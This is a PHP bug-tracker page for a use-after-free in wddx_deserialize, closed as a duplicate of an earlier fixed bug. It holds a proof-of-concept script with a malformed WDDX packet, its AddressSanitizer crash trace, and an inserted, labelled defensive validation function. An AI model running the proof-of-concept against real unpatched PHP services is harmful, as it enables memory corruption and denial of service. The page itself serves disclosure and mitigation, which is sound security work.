Sec Bug #73064 Use-After-Free in wddx_deserialize of wddx.c
Submitted: 2016-09-12 02:21 UTC Modified: 2017-02-13 01:22 UTC
From: stackexploit at gmail dot com Assigned: stas (profile)
Status: Duplicate Package: WDDX related
PHP Version: master-Git-2016-09-12 (snap) OS: Ubuntu
Private report: No CVE-ID: None
 [2016-09-12 02:21 UTC] stackexploit at gmail dot com
Description:
------------
CREDIT
-----------------------
This vulnerability was discovered by Ke Liu of Tencent's Xuanwu LAB.


PHP VERSION
-----------------------
./sapi/cli/php --version
PHP 7.2.0-dev (cli) (built: Sep 11 2016 18:37:49) ( NTS )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies


PROOF-OF-CONCEPT FILE
-----------------------
Posted in the "Test script" section.


STACKTRACE
-----------------------
Posted in the "Actual result" section.


VULNERABILITY DETAILS
-----------------------
A Use-After-Free vulnerability can be triggered in function wddx_deserialize.
To reproduce this issue, please run export USE_ZEND_ALLOC=0 before executing the test script.

Test script:
---------------
<?php
    $xml = <<<XML
<?xml version='1.0'?>
    <wEdxPacket ver='1.0'><er/>
        <data>
            <struct>
                <recordset rowt='1' fieldNames='keliu'>
                <field name='keliu'>
                <var name='php_class_name<binary>'>
                    <string>lab</string>
                </var>
            </struct>
        </data>
    </jddxPacket>
XML;
    
    $array = wddx_deserialize($xml);
    var_dump($array);
?>

Expected result:
----------------
Exit quietly.

Actual result:
--------------
==47659==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000a4c0 
    at pc 0x000000ca6599 bp 0x7ffd3028b0e0 sp 0x7ffd3028b0d8
READ of size 4 at 0x60600000a4c0 thread T0
    #0 0xca6598 in zval_delref_p php-src/Zend/zend_types.h:834:9
    #1 0xca6598 in i_zval_ptr_dtor php-src/Zend/zend_variables.h:47
    #2 0xca6598 in _zval_ptr_dtor php-src/Zend/zend_execute_API.c:550
    #3 0xac1962 in wddx_stack_destroy php-src/ext/wddx/wddx.c:233:4
    #4 0xac1962 in php_wddx_deserialize_ex php-src/ext/wddx/wddx.c:1097
    #5 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2
    #6 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2
    #7 0xe75f4b in execute_ex php-src/Zend/zend_vm_execute.h:432:7
    #8 0xe76ec3 in zend_execute php-src/Zend/zend_vm_execute.h:474:2
    #9 0xd00e9e in zend_execute_scripts php-src/Zend/zend.c:1464:4
    #10 0xad4425 in php_execute_script php-src/main/main.c:2537:14
    #11 0x10fca26 in do_cli php-src/sapi/cli/php_cli.c:990:5
    #12 0x10f9f60 in main php-src/sapi/cli/php_cli.c:1378:18
    #13 0x7f540a3b382f in __libc_start_main /build/glibc-GKVZIf/glibc-2.23/csu/../csu/libc-start.c:291
    #14 0x449578 in _start (php-src/sapi/cli/php+0x449578)

0x60600000a4c0 is located 0 bytes inside of 56-byte region [0x60600000a4c0,0x60600000a4f8)
freed by thread T0 here:
    #0 0x4e9520 in __interceptor_cfree.localalias.0 (php-src/sapi/cli/php+0x4e9520)
    #1 0xbed9e6 in _efree_56 php-src/Zend/zend_alloc.c:2367:1
    #2 0xabad7a in zif_wddx_deserialize php-src/ext/wddx/wddx.c:1299:2
    #3 0xfdfb3d in ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER php-src/Zend/zend_vm_execute.h:675:2

previously allocated by thread T0 here:
    #0 0x4e96a8 in __interceptor_malloc (php-src/sapi/cli/php+0x4e96a8)
    #1 0xbe92a1 in _emalloc_56 php-src/Zend/zend_alloc.c:2325:1

SUMMARY: AddressSanitizer: heap-use-after-free php-src/Zend/zend_types.h:834:9 in zval_delref_p
==47659==ABORTING
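The PoC above relies on a packet that is not well-formed XML (mismatched root tags, an unclosed recordset/field, and a raw `<` inside an attribute value), which ext/wddx's lenient parser accepts. As an added defensive example, not code from the bug report or from PHP itself, the following gate rejects such input with libxml before wddx_deserialize() ever sees it. It assumes a PHP 7.x build that still ships ext/wddx (the extension was removed in PHP 7.4); this is a mitigation for untrusted input on unpatched builds, not a substitute for the upstream fix for bug #72860.

```php
<?php
// Added example (not from bug #73064): refuse WDDX packets that are not
// well-formed XML, or whose root is not wddxPacket, before deserializing.
// Assumes PHP <= 7.3 with ext/wddx and ext/dom available.
function safe_wddx_deserialize(string $packet)
{
    $prev = libxml_use_internal_errors(true);
    $dom  = new DOMDocument();
    // LIBXML_NONET: never fetch external resources while checking input.
    $ok     = $dom->loadXML($packet, LIBXML_NONET);
    $errors = libxml_get_errors();
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    // Mismatched or unclosed tags and '<' inside attribute values all fail
    // here; the lenient expat path in ext/wddx is never reached for them.
    if (!$ok || $errors !== []) {
        return null;
    }
    $root = $dom->documentElement;
    if ($root === null || $root->tagName !== 'wddxPacket') {
        return null;
    }
    return wddx_deserialize($packet);
}

// Constructed sample: the malformed packet from the report, collapsed.
$malformed = <<<XML
<?xml version='1.0'?>
<wEdxPacket ver='1.0'><er/><data><struct>
<recordset rowt='1' fieldNames='keliu'><field name='keliu'>
<var name='php_class_name<binary>'><string>lab</string></var>
</struct></data></jddxPacket>
XML;

// Constructed sample: a well-formed packet that passes the gate.
$wellFormed = <<<XML
<wddxPacket version='1.0'><header/><data>
<struct><var name='k'><string>v</string></var></struct>
</data></wddxPacket>
XML;

var_dump(safe_wddx_deserialize($malformed));   // rejected by the XML gate
var_dump(safe_wddx_deserialize($wellFormed));  // passed through to wddx_deserialize()
```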

History
 [2016-09-12 02:33 UTC] stas@php.net
-Status: Open +Status: Duplicate
 [2016-09-12 02:33 UTC] stas@php.net
Seems to be duplicate of bug #72860, fixed by https://gist.github.com/anonymous/4f730c88f90c15b0216e8651af525972
 [2016-09-16 09:25 UTC] stackexploit at gmail dot com
-Status: Duplicate +Status: Closed
 [2016-09-16 09:25 UTC] stackexploit at gmail dot com
Close this issue since bug #72860 (https://bugs.php.net/bug.php?id=72860) has been closed.

BTW, bug #72860 has been assigned CVE-2016-7413.
 [2016-09-18 02:11 UTC] stackexploit at gmail dot com
Could you please help make this issue accessible publicly?
 [2016-09-18 06:15 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2017-02-13 01:22 UTC] stas@php.net
-Status: Closed +Status: Duplicate
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Fri Dec 27 00:01:30 2024 UTC